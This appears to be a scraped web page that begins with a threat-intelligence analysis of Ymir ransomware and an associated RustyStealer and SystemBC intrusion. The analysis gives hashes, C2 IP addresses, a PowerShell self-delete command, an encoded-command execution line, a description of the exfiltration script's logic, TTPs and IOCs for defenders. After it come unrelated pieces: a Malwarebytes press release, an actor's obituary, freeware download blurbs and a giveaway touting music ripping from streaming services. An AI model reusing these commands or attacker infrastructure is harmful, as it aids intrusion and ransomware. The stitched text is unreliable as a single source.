Our analysis began with a basic inspection of the artifact. We started by analyzing its properties, such as the file type, and relevant strings and capabilities, as shown in the table and images below.
Hash Value
MD5 12acbb05741a218a1c83eaa1cfc2401f
SHA-1 3648359ebae8ce7cacae1e631103659f5a8c630e
SHA-256 cb88edd192d49db12f444f764c3bdc287703666167a4ca8d533d51f86ba428d8
File type identification
File type identification
Although the binary does not raise suspicions of being packed, as its entropy is not high enough, the presence of API calls to functions like malloc, memmove and memcmp indicates that it can allocate memory to insert malicious code.
Calls for memory operation functions
Calls for memory operation functions
The binary also suspiciously imports functions, such as CryptAcquireContextA, CryptReleaseContext, CryptGenRandom, TerminateProcess and WinExec, from operating system libraries. These API calls are typically found in various ransomware samples.
Even though most of the sample information is unpacked in memory during runtime, we were able to find some useful indicators in the binary strings, including the ransom note filename and contents in a PDF file, encryption extension, PowerShell commands, and some hashes used by the encryption algorithms, as shown in the following images.
PDF contents
PDF contents
PowerShell auto-delete command and encryption hashes
PowerShell auto-delete command and encryption hashes
The attacker used the MinGW compiler, a native Windows port of the GNU Compiler Collection (GCC).
Compiler string
Compiler string
The following table shows other useful string indicators we found in the course of our analysis.
Type Value Description
String (command) powershell -w h -c Start-Sleep -Seconds 5; Remove-Item -Force -Path Auto-delete command execution via PowerShell.
String (URL) hxxps://github[.]com/qTox/qTox/releases/download/v1.17.6/setup-qtox-x86_64-release.exe Present in the PDF, software (qTox client) for contacting the attackers.
String 6C5oy2dVr6 Encryption extension.
String (filename) INCIDENT_REPORT.pdf Ransom note PDF filename. PDFs are placed in various directories.
String (date) D:20240831154833-06’00’ PDF creation date metadata.
String x64dbg Debugger name.
One interesting fact is that the PDF creation date was August 31, 2024, which matches the binary compilation timestamp (2024-08-31), as shown in the image below.
Static analysis also shows that the PDF used as the ransom note is present in the .data section of the binary. The information hardcoded in this kind of file is very useful for creating detection rules and indicators of compromise.
PDF file containing a ransom note
PDF file containing a ransom note
After reaching the main function, the malware executes another function with calls to other functions to get system information. To streamline our analysis, we renamed this function to Get_System_Information:
Malware entry point
Malware entry point
Get_System_information function and its sub-functions
Get_System_information function and its sub-functions
The artifact gathers system information by using the API calls listed below.
GetSystemTimeAsFileTime: retrieves the current system date and time.
GetCurrentProcessId: gets the current process identifier (PID).
GetCurrentThreadId: retrieves the identifier of the calling thread.
GetTickCount: gets the amount of time that the system has been running for in milliseconds. This is used for detecting that the artifact is being debugged.
QueryPerformanceCounter: retrieves the current value of the performance counter, which can be used for time-interval measurements.
System information gathering
System information gathering
The malware also contains some execution restrictions which are activated when certain parameters are set. For example, the --path parameter disables self-delete, allowing the attacker to reuse the binary for other directories.
The artifact is not deleted when running with the --path parameter
The artifact is not deleted when running with the –path parameter
While reverse-engineering the sample, we found that it borrowed code from functions related to CryptoPP, an open-source cryptographic library written in C++.
CryptoPP functions
CryptoPP functions
The malware also has a hardcoded list of file name extensions to exclude from encryption.
File name extensions to ignore
File name extensions to ignore
Dynamic analysis
While running the ransomware, we spotted hundreds of calls to the memmove function. After analyzing the data, we found that it loaded small pieces of instructions into memory for performing malicious functions. The following image shows a fragment of the malware loading environment variables after calling memmove.
Environment variables loaded into memory
Environment variables loaded into memory
The malware constantly uses the memmove function while enumerating subdirectories and files inside the affected system, so they can be encrypted later.
Directory enumeration
Directory enumeration
It also uses memmove to load strings that contain locations in the victim’s filesystem and are used for comparing with common directory names during runtime.
Strings loaded via memmove
Strings loaded via memmove
The sample uses the RtlCopyMemory function from the ntdll.dll library to load additional libraries, such as CRYPTSP.dll, rsaenh.dll, bcrypt.dll and kernelbase.dll.
Runtime loading of DLLs
Runtime loading of DLLs
The artifact uses the stream cipher ChaCha20 algorithm to encrypt files, appending the extension .6C5oy2dVr6 to each encrypted file.
ChaCha20 encryption
ChaCha20 encryption
Additionally, it copies the PDF contents from the .data section and uses the _write and _fsopen functions to generate a ransom note in PDF format within every directory in the affected system.
The ransom note informs the victim about what happened to the affected system and instructs them to contact the attackers for a deal. Although the note mentions that the attackers have stolen the data from the affected machine, the malware does not have any network capabilities for data exfiltration. This leads us to believe that the adversaries would steal data with other means once they obtained access to the computer, such as through HTTP, FTP or cloud storage uploads.
Ransom note fragment
Ransom note fragment
We spotted one odd string, a comment written in the Lingala language. This language is used in the Democratic Republic of the Congo, Republic of the Congo, Angola and the Central African Republic.
Comment in Lingala found during malware execution
Comment in Lingala found during malware execution
Another interesting fact is that the sample searches for PowerShell in each subdirectory as it repeatedly calls the RtlCopyMemory function. Once PowerShell is located, the malware uses it for deleting itself. In our investigation, we copied powershell.exe into our Desktop folder, so it was used for deleting the sample.
PowerShell binary search
PowerShell binary search
The following diagram shows a summary of the sample’s execution. Note that the only child process created was powershell.exe — the malware creates a PowerShell instance even if it finds one in the system. Subsequently, PowerShell calls conhost.exe, which is used for running services in the background.
Malicious processes
Malicious processes
Process tree
Process tree
The malware calls PowerShell with the cmdlet Start-Sleep to wait 5 seconds, and finally, uses the Remove-Item command to delete itself from the machine, as shown in the image below.
YARA rule
Based on our analysis of the sample, we developed the following YARA rule for detecting the threat in real time. The rule considers the file type, relevant strings and library function imports.
Telemetry
Using the above rule, we were able to query threat intelligence portals and find a similar sample originating from Pakistan. We believe that the attacker used a VPN network or Tor to hide their IP. The artifact we discovered looks like a test binary sent by the attacker to check if it would be detected by security vendors. The sample receives a --path parameter from the command line, which specifies the directory to be encrypted. However, it neither encrypts the files nor generates a ransom note.
Execution of the test sample
Execution of the test sample
What caught our attention was that this test version of the executable, similarly to the full-featured sample, did not delete itself when executed with the --path parameter, which made sense, since the adversary might want to select certain directories during the attack.
By comparing the two detections, we concluded that the final sample with the fully enabled encryption features, unlike the test variant, had extended functionality implemented in additional strings. These included the extension appended to the name of the encrypted files ( .6C5oy2dVr6) and the information present in the PDF file generated as a ransom note.
YARA matches comparison
YARA matches comparison
At the time of our research, 12 security vendors including Kaspersky detected the threat.
The ransomware incident
In addition to analyzing the malware, we managed to investigate an incident in Colombia where the Ymir sample was obtained. Our forensic analysis revealed that crucial evidence had been lost through the attacker’s efforts to cover their tracks. We at Kaspersky GERT were able to identify that two days before the ransomware deployment, a new RustyStealer threat was detected on multiple systems, allowing the attackers to control the machines, send commands, and gather information from compromised infrastructure. Malicious activity was detected on a domain controller shortly after, including compromised access on behalf of legitimate users, including one with high privileges. The initial RustyStealer sample was a PE file compiled with Rust and deployed to Windows\Temp under the name AudioDriver2.0.exe.
Filename AudioDriver2.0.exe
Size 3334144 bytes (3.2 MB)
MD5 5ee1befc69d120976a60a97d3254e9eb
SHA-1 e6c4d3e360a705e272ae0b505e58e3d928fb1387
This sample, named Trojan.Win32.Sheller.ey by Kaspersky, has the ability of gathering information about the file system. This sample has obfuscated content for obstructing analysis and includes shared modules indicating that the artifact can invoke functions from APIs, such as native Windows DLLs.
This sample also connects to the C2 server 74.50.84[.]181 on port 443, detected by Kaspersky as a host for malicious files since August 2024.
C2 server
C2 server
The attackers compromised the domain controller and used it to continue infiltrating systems in the targeted infrastructure. They abused compromised credentials gathered by the stealer to hop between systems using WinRM and PowerShell remote control capabilities, and then executed a set of two scripts that were confirmed to be a part of the proxy malware threat SystemBC.
Filename 1.ps1 1.ps1
Size 16239 bytes (15 KiB) 4209 bytes (4 KiB)
MD5 5384d704fadf229d08eab696404cbba6 39df773139f505657d11749804953be5
Path %windir%\temp\ HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Both scripts use PowerShell to establish a covert channel to the IP address 94.158.244[.]69 on port 443. Based on the strings from the scripts we were able to obtain, we implemented Yara rules for identifying other samples and C2 servers configured with the same codification and spotted in the wild.
SHA256 First seen First reported from C2 server Verdict
8287d54c83db03b8adcdf1409f5d1c9abb1693ac
8d000b5ae75b3a296cb3061c 2024-09-16 03:24:06 UTC Australia 94.158.244[.]69
51ffc0b7358b7611492ef458fdf9b97f121e49e70f
86a6b53b93ed923b707a03 2024-08-18 18:59:01 UTC Ukraine 85.239.61[.]60 UDS:Trojan.PowerShell.
Dnoper.posh
b087e1309f3eab6302d7503079af1ad6af06d70a9
32f7a6ae1421b942048e28a 2024-08-17 02:43:55 UTC Ukraine 85.239.61[.]60 Trojan.MSIL.Dnoper.sb
One of these scripts was spotted in multiple systems, collected as a script block for PowerShell that included a different approach and a different C2 system (5.255.117[.]134 on port 80). It was probably used to exfiltrate information from the infrastructure according to the following hardcoded functions and their instructions.
GetServerByFilename,
SendFile,
SearchRoot.
GetServerByFilename function
GetServerByFilename function
The script establishes communication with the C2 server and sends information, including a specific key that allows the attacker to identify the affected company.
The URI includes a unique key for each victim
The URI includes a unique key for each victim
Information that will be sent to C2 server
Information that will be sent to C2 server
The SearchRoot function contains a loop that searches for all files that are included in the requested folder and checks for a specific filter: the malware only uploads files with a size greater than 40 KB that were created after a specified date.
Search function
Search function
File search procedure
File search procedure
The script is Base64 encoded and passed to the following command for execution.
$selfpath\powershell.exe -Version 5.1 -s -NoLogo -NoProfile -EncodedCommand <B64CMD>
1
$selfpath\powershell.exe -Version 5.1 -s -NoLogo -NoProfile -EncodedCommand <B64CMD>
According to our GERT analysis, at the time of the research, there was a service configured at this IP address (5.255.117[.]134) for uploading files that were collected with the SystemBC scripts.
Active webservice
Active webservice
At the same time, multiple creations and executions of the well-known programs Advanced IP Scanner and Process Hacker were alerted on several systems.
advanced_ip_scanner.exe;
processhacker-2.39-setup.exe.
Finally, two days after the initial RustyStealer intrusion, attackers deployed the Ymir ransomware by executing remote connections and uploading the payload. Some traces of the execution were detected, in particular those associated with the PowerShell self-destruct script. Also, a part of the ransom note was configured in the registry key field legalnoticecaption, located in HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, which invites the user to look for additional details in the ransom note, named “INCIDENT_REPORT.pdf”:
Part of the ransom note from the registry
Part of the ransom note from the registry
Conclusion
A link between malware stealer botnets acting as access brokers and the ransomware execution is evident. The Ymir development represents a threat to all types of companies and confirms the existence of emerging groups that can impact business and organizations with a configurable, robust and well-developed malware. We have seen initial access brokers invade an organization and ensure persistence. Ymir was deployed to the targeted system shortly after. This new ransomware family was configured in a secure scheme, making it impossible to decrypt the files from the targeted system. The group behind this threat has not presented a dedicated leak site or any additional information yet, but we will continue monitoring their activity. Alerts were triggered two days prior to the ransomware incident, and the lack of action on the critical system warnings allowed the attackers to launch the ransomware. This highlights the need for improved response strategies beyond relying solely on endpoint protection platforms (EPP).
Kaspersky products detect this new threat as Trojan-Ransom.Win64.Ymir.gen.
Tactics, techniques and procedures
Below are the Ymir TTPs identified from our malware analysis.
Tactic Technique ID
Discovery File and Directory Discovery T1083
Discovery System Information Discovery T1082
Execution Command and Scripting Interpreter: PowerShell T1059.001
Impact Data Encrypted for Impact T1486
Defense evasion Virtualization/Sandbox Evasion: Time Based Evasion T1497.003
Defense evasion Indicator Removal: File Deletion T1070.004
RustyStealer TTPs:
Tactic Technique ID
Discovery File and Directory Discovery T1083
Discovery Process Discovery T1057
Execution Shared Modules T1129
Defense evasion Obfuscated Files or Information T1027
Indicators of Compromise
File Hashes
3648359ebae8ce7cacae1e631103659f5a8c630e
fe6de75d6042de714c28c0a3c0816b37e0fa4bb3
f954d1b1d13a5e4f62f108c9965707a2aa2a3c89 (INCIDENT_REPORT.pdf)
5ee1befc69d120976a60a97d3254e9eb
5384d704fadf229d08eab696404cbba6
39df773139f505657d11749804953be5
8287d54c83db03b8adcdf1409f5d1c9abb1693ac8d000b5ae75b3a296cb3061c
51ffc0b7358b7611492ef458fdf9b97f121e49e70f86a6b53b93ed923b707a03
b087e1309f3eab6302d7503079af1ad6af06d70a932f7a6ae1421b942048e28a
New technology and team will fuel additional VPN features and functionalities
SANTA CLARA, Calif., Nov. 7, 2024 /PRNewswire/ -- Malwarebytes, a global leader in real-time cyber protection, today announced the acquisition of AzireVPN, a renowned privacy-focused VPN provider. Malwarebytes has long been a defender of user privacy through its portfolio of consumer solutions, including Malwarebytes Privacy VPN and its free ad and scam blocker web extension Malwarebytes Browser Guard. This acquisition further supports the company's mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.
(PRNewsfoto/Malwarebytes)
(PRNewsfoto/Malwarebytes)
By integrating AzireVPN's advanced VPN technologies and intellectual property into its platform, Malwarebytes will deliver increased flexibility and enhanced security for customers. AzireVPN developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.
"Malwarebytes is a fierce advocate for privacy, and this acquisition reinforces our dedication to driving innovation that protects a free and open internet," said Marcin Kleczynski, Founder and CEO, Malwarebytes. "As threats to individuals' digital autonomy and security grow, we plan to build on AzireVPN's legacy to deliver cutting-edge solutions."
Malwarebytes and AzireVPN share a vision of empowering users worldwide to combat censorship and safeguard digital freedom. Known for its robust security standards and privacy-first commitment, AzireVPN physically owns and controls its servers—a practice Malwarebytes is committed to continuing.
"Joining Malwarebytes marks an exciting new chapter for AzireVPN and our privacy-conscious user base," said William Oling, Co-Founder, AzireVPN. "As pioneers in ultra-private VPN technology, we've always set the standard for security and anonymity. Now, with Malwarebytes—a leader in transparency and digital freedom—we're ready to redefine what it means to stay safe and private online for those who demand the very best in privacy protection."
This acquisition marks another milestone for Malwarebytes. The company accelerated its growth over the past year, acquiring Cyrus, a disruptive innovator in online privacy solutions, and launching Identity Theft Protection and Personal Data Remover products. It also enhanced its consumer security portfolio with an improved, integrated user experience from desktop to mobile and the introduction of Trusted Advisor with its easy-to-understand Protection Score. Additionally, it launched a free Digital Footprint scan to help users proactively think about security and their exposed personal data.
To read more about the latest threats and cyber protection strategies, visit the Malwarebytes blog, or follow us on Facebook, Instagram, LinkedIn, TikTok, and X.
About Malwarebytes
Malwarebytes is a global cybersecurity leader delivering award-winning endpoint protection, privacy and threat prevention solutions worldwide. Built on decades of experience as the last resort to find and eradicate the latest malware, Malwarebytes is now trusted by millions of individuals and organizations to stop threats at each stage of the attack lifecycle, secure digital identities and safeguard data and privacy. A world class team of threat researchers and proprietary AI-powered engines provide unmatched threat intelligence to detect and prevent known and unknown threats. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.
Malwarebytes Media Contact:
Ashley Stewart
Director of Public and Analyst Relations
press@malwarebytes.com
Cision
View original content to download multimedia:https://www.prnewswire.com/news-releases/malwarebytes-acquires-azirevpn-to-strengthen-security-and-privacy-offerings-302298280.html
https://www.msn.com/en-ca/movies/news/to...r-AA1tM42t Tony Todd, ‘Candyman' and ‘Final Destination' Actor, Dies at 69
Story by Carly Thomas • 3h • 1 min read Tony Todd, an actor who starred in the Candyman and Final Destination horror franchises, has died. He was 69.
He died Wednesday at his home in Marina del Rey after a long illness, his wife, Fatima, told The Hollywood Reporter.
"The industry has lost a legend. We have lost a cherished friend. Rest in peace, Tony, -Your Final Destination Family," New Line Cinema, which produced the horror franchise, wrote on Instagram.
In addition to Candyman and Final Destination, Todd has hundreds of TV and movie credits, including 1996's The Rock, 1994's The Crow, 2007's The Man from Earth, The Flash, 2015's Frankenstein and 2018's Hell Fest.
Vovsoft Image to Cartoon Converter is a powerful Windows application designed to transform your images into fun, cartoon-style artwork. Supporting PNG, JPG, and BMP file formats, this tool allows users to turn any photo into a cartoon with ease. With batch processing, you can convert multiple pictures simultaneously, saving you time and effort.
This software offers a variety of effects such as Cartoon, Comic Book, Cutout, Line Art, and Pen Drawing. A preview feature lets you see the results before saving, so you can make adjustments until you achieve the perfect look. Adding files is easy, with options to load individual images, select an entire folder, or drag and drop files directly from Windows Explorer.
Whether you're looking to turn a photo into anime, transform a picture into a comic-style illustration, or convert a pic into a cartoon, this program has you covered.
Category: Graphic Apps - Converters & Optimizers
Supports: Windows Windows 11, Windows 10, Windows 8/8.1, Windows 7, Windows Vista, Windows XP (64-bit)
Language: English
License: Freeware — no nags, no ads, fully functional https://vovsoft.com/version-history/imag...converter/ Image to Cartoon Converter Version History
Image to Cartoon Converter Screenshot
Version History
Changelog for the latest releases:
This page contains the complete changelog of Image to Cartoon Converter, detailing what has changed in each version.
Image to Cartoon Converter 1.0
November 7, 2024 (PST)
First public release https://vovsoft.com/download/image-to-ca...converter/ Download Image to Cartoon Converter (Installer)
Software: Image to Cartoon Converter
Version: 1.0
License: Freeware
Filename: image-to-cartoon-converter.exe Download: https://vovsoft.com/files/image-to-carto....exe?v=1.0
Filesize: 13.34 MB
Build: 64-bit https://vovsoft.com/download/image-to-ca...-portable/ Download Image to Cartoon Converter (Portable)
Software: Image to Cartoon Converter (Portable)
Version: 1.0
License: Freeware
Filename: image-to-cartoon-converter-portable.zip Download: https://vovsoft.com/files/image-to-carto....zip?v=1.0
Filesize: 15.90 MB
Build: 64-bit
VOVSOFT - Image to Cartoon Converter VOVSOFT 1.0 Was 100% Scanned Malware Free & Clean & Safe With Kaspersky Standard Multilayered protection designed to prevent and neutralise viruses and malware.
Real-Time Antivirus
Continuously scans your devices for viruses, worms, Trojans, CryptoLockers, rootkits, and spyware — guarding you against both new and established online threats.
Audials Music 2025 Edition is a powerful program that is designed to help you download any audio and video file from any popular site. That means you can have downloaded videos or audio available to watch/ listen to them anywhere, even without an internet connection. This tool makes it possible to download videos from sites such as Spotify, Deezer, Amazon Music, Apple Music in iTunes, Tidal, Napster (Rhapsody), YouTube, YouTube Music, Pandora, Dailymotion, Vimeo, etc, with quality. What’s more, you can edit and manage music files. It allows the convenient adding of additional tags during recording, cuts the songs exactly, automatically categorizes recordings by genre, etc.
Key Features:
It can scan and record music from Spotify, Soundcloud, Deezer, Amazon, Apple Music, Napster, video-sharing websites, and many other online sources.
You can save audio in MP3, AAC, or WMA format with no loss of quality
Audials can access any online music source and provide you with the latest charts or entire albums or discographies of your favorite artists in just a few seconds
It has also direct access to the highest-quality audio tracks of any music video and then downloads them
You can also add the song lists to your wish list and search for songs you like best.
Discover similar music or different versions of the same song…from other sources as well.
It allows you to play the music directly or select it with one click and get your music immediately
Audials will show you a list of suitable artists
This tool can import playlists from Spotify or video-sharing websites in the form of a link.
Supported OS:
Windows 10/8/8.1/7/Vista, Windows XP
Directions:
The download link for Audials Music 2025 is provided to you above. The download is an exclusive SharewareOnSale installer with registration built-in. Download and install Audials Music 2025. After install, run Audials Music 2025 and you will need to enter your name and email address. You will also need to verify your email address. After that, enjoy!
Terms and Conditions:
This is a 3-computer lifetime license, for noncommercial use
You get free updates for the same major version
You get free tech support
You must download and install the program before this offer has ended
![[Image: scr-ashampoo-privacy-inspector-2-presentation-2.png]](https://img.ashampoo.com/ashampoo.com_images/img/1/products/11102/en/screenshots/scr-ashampoo-privacy-inspector-2-presentation-2.png)
![[Image: scr-ashampoo-privacy-inspector-2-main.png]](https://img.ashampoo.com/ashampoo.com_images/img/1/products/11102/en/screenshots/scr-ashampoo-privacy-inspector-2-main.png)
![[Image: scr-ashampoo-privacy-inspector-2-activities.png]](https://img.ashampoo.com/ashampoo.com_images/img/1/products/11102/en/screenshots/scr-ashampoo-privacy-inspector-2-activities.png)
![[Image: scr-ashampoo-privacy-inspector-2-telemetry.png]](https://img.ashampoo.com/ashampoo.com_images/img/1/products/11102/en/screenshots/scr-ashampoo-privacy-inspector-2-telemetry.png)
![[Image: scr-ashampoo-privacy-inspector-2-websites.png]](https://img.ashampoo.com/ashampoo.com_images/img/1/products/11102/en/screenshots/scr-ashampoo-privacy-inspector-2-websites.png)
![[Image: scr-ashampoo-privacy-inspector-2-internet-traces.png]](https://img.ashampoo.com/ashampoo.com_images/img/1/products/11102/en/screenshots/scr-ashampoo-privacy-inspector-2-internet-traces.png)
![[Image: audials-music-2025-giveaway-code.png]](https://giveaway.tickcoupon.com/wp-content/uploads/2024/11/audials-music-2025-giveaway-code.png)
![[Image: nhlHkIw.jpeg]](https://i.imgur.com/nhlHkIw.jpeg)
